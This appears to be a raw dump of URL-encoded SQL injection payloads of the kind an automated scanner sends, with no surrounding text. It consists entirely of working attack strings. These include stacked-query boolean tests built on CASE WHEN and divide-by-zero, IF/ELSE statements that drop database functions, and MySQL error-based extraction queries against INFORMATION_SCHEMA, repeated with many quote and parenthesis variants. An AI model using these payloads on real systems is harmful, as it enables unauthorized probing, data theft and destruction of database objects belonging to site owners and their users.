-4588%27%20WHERE%208085%3D8085%3B%20SELECT%20%28CASE%20WHEN%20%286224%3D6444%29%20THEN%206224%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -9711%27%20WHERE%204064%3D4064%3B%20SELECT%20%28CASE%20WHEN%20%286176%3D6176%29%20THEN%206176%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -6718%27%20WHERE%208782%3D8782%3B%20SELECT%20%28CASE%20WHEN%20%282241%3D1472%29%20THEN%202241%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -7881%22%20WHERE%203061%3D3061%3B%20SELECT%20%28CASE%20WHEN%20%285604%3D2210%29%20THEN%205604%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -1009%22%20WHERE%206240%3D6240%3B%20SELECT%20%28CASE%20WHEN%20%286176%3D6176%29%20THEN%206176%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -8803%22%20WHERE%207765%3D7765%3B%20SELECT%20%28CASE%20WHEN%20%281061%3D3124%29%20THEN%201061%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- foo%29%3B%20IF%284528%3D6020%29%20SELECT%204528%20ELSE%20DROP%20FUNCTION%20zAvy%3B-- foo%29%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B-- foo%29%3B%20IF%284157%3D6209%29%20SELECT%204157%20ELSE%20DROP%20FUNCTION%20wQvR%3B-- foo%27%29%3B%20IF%287125%3D2214%29%20SELECT%207125%20ELSE%20DROP%20FUNCTION%20QABx%3B-- foo%27%29%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B-- foo%27%29%3B%20IF%283519%3D4165%29%20SELECT%203519%20ELSE%20DROP%20FUNCTION%20LwIk%3B-- foo%27%3B%20IF%286555%3D2322%29%20SELECT%206555%20ELSE%20DROP%20FUNCTION%20WXXC%3B-- foo%27%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B-- foo%27%3B%20IF%284695%3D1247%29%20SELECT%204695%20ELSE%20DROP%20FUNCTION%20SByu%3B-- foo%22%3B%20IF%284608%3D5989%29%20SELECT%204608%20ELSE%20DROP%20FUNCTION%20zyqB%3B-- foo%22%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B-- foo%22%3B%20IF%282277%3D2914%29%20SELECT%202277%20ELSE%20DROP%20FUNCTION%20BoKY%3B-- foo%29%3B%20IF%289054%3D6178%29%20SELECT%209054%20ELSE%20DROP%20FUNCTION%20VDGR%3B--%20AND%20%283819%3D3819 foo%29%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B--%20AND%20%287790%3D7790 foo%29%3B%20IF%289778%3D8376%29%20SELECT%209778%20ELSE%20DROP%20FUNCTION%20txlW%3B--%20AND%20%286209%3D6209 foo%29%29%3B%20IF%283047%3D7725%29%20SELECT%203047%20ELSE%20DROP%20FUNCTION%20BkEL%3B--%20AND%20%28%281105%3D1105 foo%29%29%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B--%20AND%20%28%284052%3D4052 foo%29%29%3B%20IF%281336%3D7812%29%20SELECT%201336%20ELSE%20DROP%20FUNCTION%20Anrm%3B--%20AND%20%28%285735%3D5735 foo%29%29%29%3B%20IF%285381%3D6172%29%20SELECT%205381%20ELSE%20DROP%20FUNCTION%20LjVV%3B--%20AND%20%28%28%288470%3D8470 foo%29%29%29%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B--%20AND%20%28%28%285804%3D5804 foo%29%29%29%3B%20IF%283311%3D1106%29%20SELECT%203311%20ELSE%20DROP%20FUNCTION%20Cjzb%3B--%20AND%20%28%28%281776%3D1776 foo%3B%20IF%285844%3D5012%29%20SELECT%205844%20ELSE%20DROP%20FUNCTION%20nREQ%3B-- foo%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B-- foo%3B%20IF%281302%3D5415%29%20SELECT%201302%20ELSE%20DROP%20FUNCTION%20uPyt%3B-- foo%27%29%3B%20IF%285350%3D5315%29%20SELECT%205350%20ELSE%20DROP%20FUNCTION%20PhqM%3B--%20AND%20%28%27KzSg%27%3D%27KzSg foo%27%29%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B--%20AND%20%28%27rvSx%27%3D%27rvSx foo%27%29%3B%20IF%283373%3D1018%29%20SELECT%203373%20ELSE%20DROP%20FUNCTION%20hrjm%3B--%20AND%20%28%27jdbO%27%3D%27jdbO foo%27%29%29%3B%20IF%282706%3D9950%29%20SELECT%202706%20ELSE%20DROP%20FUNCTION%20aDId%3B--%20AND%20%28%28%27VCfp%27%3D%27VCfp foo%27%29%29%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B--%20AND%20%28%28%27DulL%27%3D%27DulL foo%27%29%29%3B%20IF%285127%3D3050%29%20SELECT%205127%20ELSE%20DROP%20FUNCTION%20bXEq%3B--%20AND%20%28%28%27eGSN%27%3D%27eGSN foo%27%29%29%29%3B%20IF%285658%3D8227%29%20SELECT%205658%20ELSE%20DROP%20FUNCTION%20jDgl%3B--%20AND%20%28%28%28%27QOBs%27%3D%27QOBs foo%27%29%29%29%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B--%20AND%20%28%28%28%27wNtz%27%3D%27wNtz foo%27%29%29%29%3B%20IF%285620%3D5449%29%20SELECT%205620%20ELSE%20DROP%20FUNCTION%20MIfp%3B--%20AND%20%28%28%28%27zsNg%27%3D%27zsNg foo%27%3B%20IF%289275%3D6611%29%20SELECT%209275%20ELSE%20DROP%20FUNCTION%20plWa%3B--%20AND%20%27zadH%27%3D%27zadH foo%27%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B--%20AND%20%27xpwg%27%3D%27xpwg foo%27%3B%20IF%285890%3D8044%29%20SELECT%205890%20ELSE%20DROP%20FUNCTION%20OGSY%3B--%20AND%20%27xwmn%27%3D%27xwmn foo%27%29%3B%20IF%284129%3D2454%29%20SELECT%204129%20ELSE%20DROP%20FUNCTION%20xEBT%3B--%20AND%20%28%27oVwb%27%20LIKE%20%27oVwb foo%27%29%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B--%20AND%20%28%27ImYu%27%20LIKE%20%27ImYu foo%27%29%3B%20IF%283276%3D5972%29%20SELECT%203276%20ELSE%20DROP%20FUNCTION%20pyIt%3B--%20AND%20%28%27SSZy%27%20LIKE%20%27SSZy foo%27%29%29%3B%20IF%282482%3D8403%29%20SELECT%202482%20ELSE%20DROP%20FUNCTION%20oJpL%3B--%20AND%20%28%28%27vIBV%27%20LIKE%20%27vIBV foo%27%29%29%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B--%20AND%20%28%28%27xmUA%27%20LIKE%20%27xmUA foo%27%29%29%3B%20IF%281371%3D5452%29%20SELECT%201371%20ELSE%20DROP%20FUNCTION%20Pudv%3B--%20AND%20%28%28%27LTVp%27%20LIKE%20%27LTVp foo%27%29%29%29%3B%20IF%286604%3D2719%29%20SELECT%206604%20ELSE%20DROP%20FUNCTION%20xrGA%3B--%20AND%20%28%28%28%27rTov%27%20LIKE%20%27rTov foo%27%29%29%29%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B--%20AND%20%28%28%28%27jYHw%27%20LIKE%20%27jYHw foo%27%29%29%29%3B%20IF%287459%3D3029%29%20SELECT%207459%20ELSE%20DROP%20FUNCTION%20KnMA%3B--%20AND%20%28%28%28%27pfRe%27%20LIKE%20%27pfRe foo%27%3B%20IF%283117%3D5251%29%20SELECT%203117%20ELSE%20DROP%20FUNCTION%20IFWb%3B--%20AND%20%27kQoA%27%20LIKE%20%27kQoA foo%27%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B--%20AND%20%27rqPg%27%20LIKE%20%27rqPg foo%27%3B%20IF%282675%3D9538%29%20SELECT%202675%20ELSE%20DROP%20FUNCTION%20RyTR%3B--%20AND%20%27Nymn%27%20LIKE%20%27Nymn foo%22%29%3B%20IF%282938%3D9105%29%20SELECT%202938%20ELSE%20DROP%20FUNCTION%20esAv%3B--%20AND%20%28%22ZZao%22%3D%22ZZao foo%22%29%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B--%20AND%20%28%22bcCV%22%3D%22bcCV foo%22%29%3B%20IF%289755%3D2728%29%20SELECT%209755%20ELSE%20DROP%20FUNCTION%20BbrE%3B--%20AND%20%28%22WhcG%22%3D%22WhcG foo%22%29%29%3B%20IF%281245%3D5296%29%20SELECT%201245%20ELSE%20DROP%20FUNCTION%20HVow%3B--%20AND%20%28%28%22zvzg%22%3D%22zvzg foo%22%29%29%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B--%20AND%20%28%28%22vTMq%22%3D%22vTMq foo%22%29%29%3B%20IF%287047%3D1626%29%20SELECT%207047%20ELSE%20DROP%20FUNCTION%20nXnU%3B--%20AND%20%28%28%22KSPx%22%3D%22KSPx foo%22%29%29%29%3B%20IF%281873%3D4177%29%20SELECT%201873%20ELSE%20DROP%20FUNCTION%20FMAR%3B--%20AND%20%28%28%28%22TsQs%22%3D%22TsQs foo%22%29%29%29%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B--%20AND%20%28%28%28%22RWTb%22%3D%22RWTb foo%22%29%29%29%3B%20IF%285989%3D4581%29%20SELECT%205989%20ELSE%20DROP%20FUNCTION%20PKRW%3B--%20AND%20%28%28%28%22ikeI%22%3D%22ikeI foo%22%3B%20IF%281571%3D1781%29%20SELECT%201571%20ELSE%20DROP%20FUNCTION%20sULS%3B--%20AND%20%22jyIe%22%3D%22jyIe foo%22%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B--%20AND%20%22gVYH%22%3D%22gVYH foo%22%3B%20IF%282658%3D4411%29%20SELECT%202658%20ELSE%20DROP%20FUNCTION%20TExM%3B--%20AND%20%22nDJX%22%3D%22nDJX foo%22%29%3B%20IF%287626%3D9049%29%20SELECT%207626%20ELSE%20DROP%20FUNCTION%20ZIlm%3B--%20AND%20%28%22WIEr%22%20LIKE%20%22WIEr foo%22%29%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B--%20AND%20%28%22QzTD%22%20LIKE%20%22QzTD foo%22%29%3B%20IF%282161%3D3064%29%20SELECT%202161%20ELSE%20DROP%20FUNCTION%20UerN%3B--%20AND%20%28%22gzUS%22%20LIKE%20%22gzUS foo%22%29%29%3B%20IF%287933%3D3247%29%20SELECT%207933%20ELSE%20DROP%20FUNCTION%20LXWG%3B--%20AND%20%28%28%22JirX%22%20LIKE%20%22JirX foo%22%29%29%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B--%20AND%20%28%28%22hAPc%22%20LIKE%20%22hAPc foo%22%29%29%3B%20IF%288151%3D9687%29%20SELECT%208151%20ELSE%20DROP%20FUNCTION%20qvRc%3B--%20AND%20%28%28%22PfbF%22%20LIKE%20%22PfbF foo%22%29%29%29%3B%20IF%285428%3D2005%29%20SELECT%205428%20ELSE%20DROP%20FUNCTION%20TGIc%3B--%20AND%20%28%28%28%22DFFZ%22%20LIKE%20%22DFFZ foo%22%29%29%29%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B--%20AND%20%28%28%28%22vwVo%22%20LIKE%20%22vwVo foo%22%29%29%29%3B%20IF%281474%3D5190%29%20SELECT%201474%20ELSE%20DROP%20FUNCTION%20aUGn%3B--%20AND%20%28%28%28%22DBfq%22%20LIKE%20%22DBfq foo%22%3B%20IF%287124%3D9443%29%20SELECT%207124%20ELSE%20DROP%20FUNCTION%20vtlW%3B--%20AND%20%22JYIt%22%20LIKE%20%22JYIt foo%22%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B--%20AND%20%22XRhm%22%20LIKE%20%22XRhm foo%22%3B%20IF%281500%3D5148%29%20SELECT%201500%20ELSE%20DROP%20FUNCTION%20tVog%3B--%20AND%20%22JRTw%22%20LIKE%20%22JRTw foo%29%20WHERE%201048%3D1048%3B%20IF%287025%3D9764%29%20SELECT%207025%20ELSE%20DROP%20FUNCTION%20JeFo%3B-- foo%29%20WHERE%206123%3D6123%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B-- foo%29%20WHERE%208856%3D8856%3B%20IF%281947%3D2260%29%20SELECT%201947%20ELSE%20DROP%20FUNCTION%20PByL%3B-- foo%27%29%20WHERE%204982%3D4982%3B%20IF%284986%3D2625%29%20SELECT%204986%20ELSE%20DROP%20FUNCTION%20BUUT%3B-- foo%27%29%20WHERE%204665%3D4665%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B-- foo%27%29%20WHERE%209837%3D9837%3B%20IF%289940%3D3874%29%20SELECT%209940%20ELSE%20DROP%20FUNCTION%20DFnQ%3B-- foo%27%20WHERE%209570%3D9570%3B%20IF%286924%3D9980%29%20SELECT%206924%20ELSE%20DROP%20FUNCTION%20FAGu%3B-- foo%27%20WHERE%209901%3D9901%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B-- foo%27%20WHERE%208503%3D8503%3B%20IF%289350%3D6447%29%20SELECT%209350%20ELSE%20DROP%20FUNCTION%20duyM%3B-- foo%22%20WHERE%206418%3D6418%3B%20IF%283949%3D3049%29%20SELECT%203949%20ELSE%20DROP%20FUNCTION%20eocT%3B-- foo%22%20WHERE%204037%3D4037%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B-- foo%22%20WHERE%209229%3D9229%3B%20IF%289879%3D9712%29%20SELECT%209879%20ELSE%20DROP%20FUNCTION%20ykeO%3B-- foo%27%20%7C%7C%20%28SELECT%209244%20FROM%20DUAL%20WHERE%203635%3D3635%3B%20IF%286618%3D2319%29%20SELECT%206618%20ELSE%20DROP%20FUNCTION%20Fvag%3B--%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%209848%20FROM%20DUAL%20WHERE%205826%3D5826%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B--%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%202682%20FROM%20DUAL%20WHERE%203124%3D3124%3B%20IF%283212%3D1238%29%20SELECT%203212%20ELSE%20DROP%20FUNCTION%20yOQh%3B--%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%208822%20WHERE%204415%3D4415%3B%20IF%283522%3D7095%29%20SELECT%203522%20ELSE%20DROP%20FUNCTION%20Qykl%3B--%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%201212%20WHERE%209018%3D9018%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B--%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%205984%20WHERE%201310%3D1310%3B%20IF%289135%3D9758%29%20SELECT%209135%20ELSE%20DROP%20FUNCTION%20Qfid%3B--%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%206637%20FROM%20DUAL%20WHERE%206115%3D6115%3B%20IF%286877%3D4932%29%20SELECT%206877%20ELSE%20DROP%20FUNCTION%20KToi%3B--%20%29 foo%20%2B%20%28SELECT%203551%20FROM%20DUAL%20WHERE%208165%3D8165%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B--%20%29 foo%20%2B%20%28SELECT%205160%20FROM%20DUAL%20WHERE%205429%3D5429%3B%20IF%289752%3D7531%29%20SELECT%209752%20ELSE%20DROP%20FUNCTION%20cuMa%3B--%20%29 foo%20%2B%20%28SELECT%209825%20WHERE%205546%3D5546%3B%20IF%283894%3D8747%29%20SELECT%203894%20ELSE%20DROP%20FUNCTION%20GemT%3B--%20%29 foo%20%2B%20%28SELECT%205172%20WHERE%203725%3D3725%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B--%20%29 foo%20%2B%20%28SELECT%202209%20WHERE%204447%3D4447%3B%20IF%287100%3D9491%29%20SELECT%207100%20ELSE%20DROP%20FUNCTION%20OuJF%3B--%20%29 foo%27%20%2B%20%28SELECT%20%27Xlrn%27%20FROM%20DUAL%20WHERE%202466%3D2466%3B%20IF%281219%3D1588%29%20SELECT%201219%20ELSE%20DROP%20FUNCTION%20yZUZ%3B--%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27QjXx%27%20FROM%20DUAL%20WHERE%201529%3D1529%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B--%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27OWUJ%27%20FROM%20DUAL%20WHERE%203224%3D3224%3B%20IF%289616%3D9950%29%20SELECT%209616%20ELSE%20DROP%20FUNCTION%20DDvO%3B--%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27tPFl%27%20WHERE%205900%3D5900%3B%20IF%281071%3D7792%29%20SELECT%201071%20ELSE%20DROP%20FUNCTION%20mqyu%3B--%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27kUlL%27%20WHERE%205526%3D5526%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B--%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27QghS%27%20WHERE%204731%3D4731%3B%20IF%281463%3D2676%29%20SELECT%201463%20ELSE%20DROP%20FUNCTION%20RMPN%3B--%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%3B%20IF%287396%3D4897%29%20SELECT%207396%20ELSE%20DROP%20FUNCTION%20nUFb%3B--%20%23 foo%27%20IN%20BOOLEAN%20MODE%29%3B%20IF%287801%3D7801%29%20SELECT%207801%20ELSE%20DROP%20FUNCTION%20adxu%3B--%20%23 foo%27%20IN%20BOOLEAN%20MODE%29%3B%20IF%281902%3D8350%29%20SELECT%201902%20ELSE%20DROP%20FUNCTION%20YAWS%3B--%20%23 foo%29%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 foo%27%29%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 foo%27%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 foo%22%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 foo%29%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%284702%3D4702 foo%29%29%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%284812%3D4812 foo%29%29%29%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%282103%3D2103 foo%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 foo%27%29%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27snJz%27%3D%27snJz foo%27%29%29%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%27uPXq%27%3D%27uPXq foo%27%29%29%29%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%27AWXB%27%3D%27AWXB foo%27%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27nTNz%27%3D%27nTNz foo%27%29%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27QVTa%27%20LIKE%20%27QVTa foo%27%29%29%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%27FIJn%27%20LIKE%20%27FIJn foo%27%29%29%29%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%27dEdM%27%20LIKE%20%27dEdM foo%27%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27wqxC%27%20LIKE%20%27wqxC foo%22%29%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%22vjhM%22%3D%22vjhM foo%22%29%29%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%22rikf%22%3D%22rikf foo%22%29%29%29%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%22SmtX%22%3D%22SmtX foo%22%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%22nJbg%22%3D%22nJbg foo%22%29%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%22BRRZ%22%20LIKE%20%22BRRZ foo%22%29%29%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%22BFvc%22%20LIKE%20%22BFvc foo%22%29%29%29%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%22OLXg%22%20LIKE%20%22OLXg foo%22%20AND%20%28SELECT%207715%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%287715%3D7715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%22mZkn%22%20LIKE%20%22mZkn 